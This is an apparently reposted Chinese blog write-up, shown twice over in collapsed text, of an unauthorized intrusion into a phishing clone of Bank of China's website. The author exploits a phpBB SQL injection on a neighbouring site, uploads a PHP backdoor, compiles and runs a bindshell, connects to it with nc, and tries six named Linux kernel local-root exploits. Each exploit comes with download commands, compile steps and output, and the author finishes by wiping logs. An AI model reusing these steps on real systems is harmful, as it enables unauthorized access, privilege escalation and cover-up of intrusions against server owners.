作者分享对中国银行虚假网站的入侵测试过程。先收集服务器信息,利用phpbb漏洞上传木马、生成bindshell,采集系统信息后尝试本地提权,测试多个Linux内核漏洞提权方法均未成功,最后清理文件,整理相关漏洞供大家参考。
作者:阿酷
http://www.coolersky.com/
本来不打算把这个不成功的
入侵
写出来的,后来有几个朋友想看,既然能在内部交流,也没有什么见不得人的,索性发出来,初学者可以借鉴一点经验,高手可以在此基础上作更多尝试,我也想多学点东西。
27日晚看到天天网的一片报道:
中国银行网站再次遭遇克隆假网站远在北美
,本站转载路径:
_
blank>
http://www.coolersky.com/web/news/20050228014041.asp
本来要整理规划的,既然出了这个事情,好歹看看吧。废话不说,开始!
1、收集信息
服务
器信息:
Apache/1.3.33
PHP/4.3.9
网站主文件:
_
blank>
http://www.banochi.net/english/index.shtml
查看虚假网站,基本没发现什么可用的东西,估计只有记录
密码
和ip的cgi程序。除了
服务
器
入侵
,还可以考虑旁注。
检索其他站点,分析了几个php站点的注入,没太多利用的地方。想起phpbb的洞洞,写段
代码
检索一下viewtopic.php文件,找到一个phpbb2.0.10
入侵
点
_
blank>
http://www.bits-clsu.org/forum/viewtopic.php?t=1
事后才想起可以用旁注
工具
直接来检索,反正都一样。
2、上传
木马
利用phpbb的洞,
漏洞
介绍
“phpBB远程任意SQL注入漏洞
”,“
phpbbsql
注入
漏洞
分析”上传php后门。
3、生成bindshell
我还在看文件的时候,Edward就已经做了个bindshell出来,呵呵!基本方法:
上传bindshell.c
gcc-o/tmp/bindbindshell.c
/tmp/bind
nc上去看看,还是在shell下比较方便。
nc-vv216.22.48.727758
4、采集系统信息
拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等,检索到虚假网站的绝对路径/home/banochin/public
_
html/,在webshell中查看文件创建的时期是
服务
器时间2004-12-15,在其cgi-bin目录下有如下文件
文件创建日期最后修改大小属性
[member]2005-02-2121:39:032005-02-2121:39:030700
errlog.dat2005-02-2800:32:222005-02-2800:32:22140.186KB0600
id.dat2005-02-2410:48:352005-02-2410:48:351.727KB0600
index.htm2004-12-1503:19:512004-12-1503:19:510.697KB0644
pwd.dat2005-02-2500:36:152005-02-2500:36:150.170KB0600
pwdbak.dat2004-12-1503:24:172004-12-1503:19:550.516KB0600
security.cgi2004-12-1503:24:032004-12-1503:20:0044.363KB0700
visemailer.cgi2004-12-1503:24:042004-12-1503:20:023.554KB0700
可以看到最后记录的
密码
日期是2月25日,而浏览目录后发现还包括了很多其他语言的中国银行网站内容,但基本都是html文件,想必是从中国银行直接webdump下来的。
内核信息,因为我们对其目录没有写权限,接着要做的就是提权了。前后大概用了1小时左右,而剩下的提权工作却花了我1天多的时间,结果还是没搞定,郁闷!
uname-r
2.4.20-021stab022.11.777-enterprise
5、本地提升权限测试
增加环境变量
exportPATH=/usr/bin:$PATH
否则会出现collect2:cannotfind`ld'错误!
(1)LinuxKernelmoxa串行驱动BSS溢出
漏洞
grsecurity2.1.0release/5Linuxkerneladvisories
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7446&keyword=
_
blank>
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件:
[url=target=_blank#?>_andhttp://grsecurity.net/~spender/exploits
_
and
_
patches.tgz
测试:
wget
[url=target=_blank#?>_andhttp://grsecurity.net/~spender/exploits
_
and
_
patches.tgz
tar-zxvfexploits
_
and
_
patches.tgz
cdexploits
_
and
_
patches
makealloc=0x100000
------------------------------------------------------------------------
nasm-felf-DALLOCATE=32482374mlock-dos.S
make:nasm:Commandnotfound
make:***[all]Error127
------------------------------------------------------------------------
结论:
缺少nasm,即使上传rpm也不能够执行安装!
(2)LinuxKerneluselib()特权提升
漏洞
Linuxkernelsys
_
useliblocalrootvulnerability
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7326&keyword=
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
_
blank>
http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件:
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
测试:
gcc-O2-fomit-frame-pointerelflbl
_
v108.c-oelflbl
_
v108
------------------------------------------------------------------------
elflbl
_
v108.c:Infunction`check
_
vma
_
flags':
elflbl
_
v108.c:545:warning:deprecateduseoflabelatendofcompoundstatement
------------------------------------------------------------------------
./elflbl
_
v108
------------------------------------------------------------------------
child1VMAs0
[+]movedstackbff73000,task
_
size=0xc0000000,map
_
base=0xbf800000
[+]vmallocarea0xc7c00000-0xcf707000
Wait...-Segmentationfault
-------------------------------------------------------------------------
gcc-O2-fomit-frame-pointerelflbl
_
v109.c-oelflbl
_
v109
./elflbl
_
v109
------------------------------------------------------------------------
[+]SLABcleanup
[-]FAILED:get
_
slab
_
objs:/proc/slabinfonotreadable?(Nosuchfileordirectory)
sh:line9:24080Killed./elflbl
_
v109
------------------------------------------------------------------------
(3)Linux内核本地整数溢出和内存泄露
漏洞
funwith
linux
kernel
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7269&keyword=
_
blank>
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试:
gcc-ovcvc
_
resize.c
./vc
_
resize
------------------------------------------------------------------------
open:Nosuchdeviceoraddress
------------------------------------------------------------------------
gccmemory
_
leak.c-omemory
_
leak
------------------------------------------------------------------------
memory
_
leak.c:80:2:warning:nonewlineatendoffile
------------------------------------------------------------------------
(4)LinuxKerneldo
_
mremapVMA本地权限提升
漏洞
Linuxkerneldo
_
mremapVMAlimitlocalprivilegeescalation
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=6102&keyword=%CC%E1%C9%FD
_
blank>
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件:
_
blank>http://rhea.oamk.fi/~pyanil00/temp/mremap
_
pte.c
测试:
gcc-O3-static-fomit-frame-pointermremap
_
pte.c-omremap
_
pte
./mremap
_
pte
------------------------------------------------------------------------
[+]kernel2.4.20-021stab022.11.777-enterprisevulnerable:YESexploitableYES
MMAP#655300x50bfa000-0x50bfb000
[-]Failed
------------------------------------------------------------------------
(5)LinuxKernelkmod/ptrace竞争条件权限提升
漏洞
linux
kmod/ptracebug-details
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=4570&keyword=%CC%E1%C9%FD
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件:
_
blank>
http://august.v-lo.krakow.pl/~anszom/km3.c
测试:
gcc-okm3km3.c
./km3?
------------------------------------------------------------------------
Usage:./km3[-d][-b][-r][-s][-cexecutable]
-d--usedouble-ptracemethod(toruninteractiveprograms)
-b--startbindshellonport4112
-r--supportrandomizedpids
-c--chooseexecutabletostart
-s--single-shotmode-abortifunsuccessfulatthefirsttry
------------------------------------------------------------------------
./km3-s
------------------------------------------------------------------------
Linuxkmod+ptracelocalrootexploitby
=>Simplemode,executing/usr/bin/id>/dev/tty
sizeof(shellcode)=95
=>Childprocessstarted..........
Failed
------------------------------------------------------------------------
(6)LinuxKerneli386SMP页错误处理器特权提升
漏洞
Linuxkerneli386SMPpagefaulthandlerprivilegeescalation
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7338
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试:
gcc-osmpsmp.c
./smp
------------------------------------------------------------------------
[+]inthread1(pid=5400)
[+]inthread2(pid=5401)
[+]rdtsccalibration:53428
[+]exploitingrace,wait...
[-]unabletoexploitracein30s,
kernelpatchedorloadtoohigh.
------------------------------------------------------------------------
尝试多个本地提权均未能成功!很郁闷!而在测试过程的时候,虚假网站已经被关闭了,虽然文件还在,但是很明显官方已经作了努力,并得到了不错的结果。
6、其他
找了几个
linux
的键盘记录,都要root权限。而
服务
器远程连接使用的ssh的,使用sniffer也估计没戏,所以暂时也没什么思路,清理exp、日志文件。
以上是我的一些测试的结果,结果也没有拿到root,不过我整理了一下相关的
漏洞
,希望对大家以后有些帮助。在站长群里发布了相关的结果,也没有人回话,不知道大家是太忙。。。
文中并未特殊处理
漏洞
及结果,有兴趣的可以直接利用,不过没必要为难其他站点,我想大家明白我的意思!
折腾了这么久,还有好多工作的事情要做!希望不会被老板说,呵呵!
最后感谢Edward、老黑及几位公司的高人!
文章可随意转载,但请注明出处,尤其文中全部及部分内容不得用户任何商业或
收费
行为,谢谢!
http://www.coolersky.com/
本来不打算把这个不成功的
入侵
写出来的,后来有几个朋友想看,既然能在内部交流,也没有什么见不得人的,索性发出来,初学者可以借鉴一点经验,高手可以在此基础上作更多尝试,我也想多学点东西。
27日晚看到天天网的一片报道:
中国银行网站再次遭遇克隆假网站远在北美
,本站转载路径:
_
blank>
http://www.coolersky.com/web/news/20050228014041.asp
本来要整理规划的,既然出了这个事情,好歹看看吧。废话不说,开始!
1、收集信息
服务
器信息:
Apache/1.3.33
PHP/4.3.9
网站主文件:
_
blank>
http://www.banochi.net/english/index.shtml
查看虚假网站,基本没发现什么可用的东西,估计只有记录
密码
和ip的cgi程序。除了
服务
器
入侵
,还可以考虑旁注。
检索其他站点,分析了几个php站点的注入,没太多利用的地方。想起phpbb的洞洞,写段
代码
检索一下viewtopic.php文件,找到一个phpbb2.0.10
入侵
点
_
blank>
http://www.bits-clsu.org/forum/viewtopic.php?t=1
事后才想起可以用旁注
工具
直接来检索,反正都一样。
2、上传
木马
利用phpbb的洞,
漏洞
介绍
“phpBB远程任意SQL注入漏洞
”,“
phpbbsql
注入
漏洞
分析”上传php后门。
3、生成bindshell
我还在看文件的时候,Edward就已经做了个bindshell出来,呵呵!基本方法:
上传bindshell.c
gcc-o/tmp/bindbindshell.c
/tmp/bind
nc上去看看,还是在shell下比较方便。
nc-vv216.22.48.727758
4、采集系统信息
拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等,检索到虚假网站的绝对路径/home/banochin/public
_
html/,在webshell中查看文件创建的时期是
服务
器时间2004-12-15,在其cgi-bin目录下有如下文件
文件创建日期最后修改大小属性
[member]2005-02-2121:39:032005-02-2121:39:030700
errlog.dat2005-02-2800:32:222005-02-2800:32:22140.186KB0600
id.dat2005-02-2410:48:352005-02-2410:48:351.727KB0600
index.htm2004-12-1503:19:512004-12-1503:19:510.697KB0644
pwd.dat2005-02-2500:36:152005-02-2500:36:150.170KB0600
pwdbak.dat2004-12-1503:24:172004-12-1503:19:550.516KB0600
security.cgi2004-12-1503:24:032004-12-1503:20:0044.363KB0700
visemailer.cgi2004-12-1503:24:042004-12-1503:20:023.554KB0700
可以看到最后记录的
密码
日期是2月25日,而浏览目录后发现还包括了很多其他语言的中国银行网站内容,但基本都是html文件,想必是从中国银行直接webdump下来的。
内核信息,因为我们对其目录没有写权限,接着要做的就是提权了。前后大概用了1小时左右,而剩下的提权工作却花了我1天多的时间,结果还是没搞定,郁闷!
uname-r
2.4.20-021stab022.11.777-enterprise
5、本地提升权限测试
增加环境变量
exportPATH=/usr/bin:$PATH
否则会出现collect2:cannotfind`ld'错误!
(1)LinuxKernelmoxa串行驱动BSS溢出
漏洞
grsecurity2.1.0release/5Linuxkerneladvisories
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7446&keyword=
_
blank>
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件:
[url=target=_blank#?>_andhttp://grsecurity.net/~spender/exploits
_
and
_
patches.tgz
测试:
wget
[url=target=_blank#?>_andhttp://grsecurity.net/~spender/exploits
_
and
_
patches.tgz
tar-zxvfexploits
_
and
_
patches.tgz
cdexploits
_
and
_
patches
makealloc=0x100000
------------------------------------------------------------------------
nasm-felf-DALLOCATE=32482374mlock-dos.S
make:nasm:Commandnotfound
make:***[all]Error127
------------------------------------------------------------------------
结论:
缺少nasm,即使上传rpm也不能够执行安装!
(2)LinuxKerneluselib()特权提升
漏洞
Linuxkernelsys
_
useliblocalrootvulnerability
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7326&keyword=
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
_
blank>
http://isec.pl/vulnerabilities/isec-0021-uselib.txt
文件:
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&q=p3
测试:
gcc-O2-fomit-frame-pointerelflbl
_
v108.c-oelflbl
_
v108
------------------------------------------------------------------------
elflbl
_
v108.c:Infunction`check
_
vma
_
flags':
elflbl
_
v108.c:545:warning:deprecateduseoflabelatendofcompoundstatement
------------------------------------------------------------------------
./elflbl
_
v108
------------------------------------------------------------------------
child1VMAs0
[+]movedstackbff73000,task
_
size=0xc0000000,map
_
base=0xbf800000
[+]vmallocarea0xc7c00000-0xcf707000
Wait...-Segmentationfault
-------------------------------------------------------------------------
gcc-O2-fomit-frame-pointerelflbl
_
v109.c-oelflbl
_
v109
./elflbl
_
v109
------------------------------------------------------------------------
[+]SLABcleanup
[-]FAILED:get
_
slab
_
objs:/proc/slabinfonotreadable?(Nosuchfileordirectory)
sh:line9:24080Killed./elflbl
_
v109
------------------------------------------------------------------------
(3)Linux内核本地整数溢出和内存泄露
漏洞
funwith
linux
kernel
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7269&keyword=
_
blank>
http://marc.theaimsgroup.com/?l=full-disclosure&m=110374209001676&w=2
测试:
gcc-ovcvc
_
resize.c
./vc
_
resize
------------------------------------------------------------------------
open:Nosuchdeviceoraddress
------------------------------------------------------------------------
gccmemory
_
leak.c-omemory
_
leak
------------------------------------------------------------------------
memory
_
leak.c:80:2:warning:nonewlineatendoffile
------------------------------------------------------------------------
(4)LinuxKerneldo
_
mremapVMA本地权限提升
漏洞
Linuxkerneldo
_
mremapVMAlimitlocalprivilegeescalation
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=6102&keyword=%CC%E1%C9%FD
_
blank>
http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
文件:
_
blank>http://rhea.oamk.fi/~pyanil00/temp/mremap
_
pte.c
测试:
gcc-O3-static-fomit-frame-pointermremap
_
pte.c-omremap
_
pte
./mremap
_
pte
------------------------------------------------------------------------
[+]kernel2.4.20-021stab022.11.777-enterprisevulnerable:YESexploitableYES
MMAP#655300x50bfa000-0x50bfb000
[-]Failed
------------------------------------------------------------------------
(5)LinuxKernelkmod/ptrace竞争条件权限提升
漏洞
linux
kmod/ptracebug-details
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=4570&keyword=%CC%E1%C9%FD
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=104811209231385&w=2
文件:
_
blank>
http://august.v-lo.krakow.pl/~anszom/km3.c
测试:
gcc-okm3km3.c
./km3?
------------------------------------------------------------------------
Usage:./km3[-d][-b][-r][-s][-cexecutable]
-d--usedouble-ptracemethod(toruninteractiveprograms)
-b--startbindshellonport4112
-r--supportrandomizedpids
-c--chooseexecutabletostart
-s--single-shotmode-abortifunsuccessfulatthefirsttry
------------------------------------------------------------------------
./km3-s
------------------------------------------------------------------------
Linuxkmod+ptracelocalrootexploitby
=>Simplemode,executing/usr/bin/id>/dev/tty
sizeof(shellcode)=95
=>Childprocessstarted..........
Failed
------------------------------------------------------------------------
(6)LinuxKerneli386SMP页错误处理器特权提升
漏洞
Linuxkerneli386SMPpagefaulthandlerprivilegeescalation
URL:
[url=target=_blank#?>_bug&do=view&bughttp://www.nsfocus.net/index.php?act=sec
_
bug&do=view&bug
_
id=7338
_
blank>
http://marc.theaimsgroup.com/?l=bugtraq&m=110554694522719&w=2
测试:
gcc-osmpsmp.c
./smp
------------------------------------------------------------------------
[+]inthread1(pid=5400)
[+]inthread2(pid=5401)
[+]rdtsccalibration:53428
[+]exploitingrace,wait...
[-]unabletoexploitracein30s,
kernelpatchedorloadtoohigh.
------------------------------------------------------------------------
尝试多个本地提权均未能成功!很郁闷!而在测试过程的时候,虚假网站已经被关闭了,虽然文件还在,但是很明显官方已经作了努力,并得到了不错的结果。
6、其他
找了几个
linux
的键盘记录,都要root权限。而
服务
器远程连接使用的ssh的,使用sniffer也估计没戏,所以暂时也没什么思路,清理exp、日志文件。
以上是我的一些测试的结果,结果也没有拿到root,不过我整理了一下相关的
漏洞
,希望对大家以后有些帮助。在站长群里发布了相关的结果,也没有人回话,不知道大家是太忙。。。
文中并未特殊处理
漏洞
及结果,有兴趣的可以直接利用,不过没必要为难其他站点,我想大家明白我的意思!
折腾了这么久,还有好多工作的事情要做!希望不会被老板说,呵呵!
最后感谢Edward、老黑及几位公司的高人!
文章可随意转载,但请注明出处,尤其文中全部及部分内容不得用户任何商业或
收费
行为,谢谢!
扫一扫
3372
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
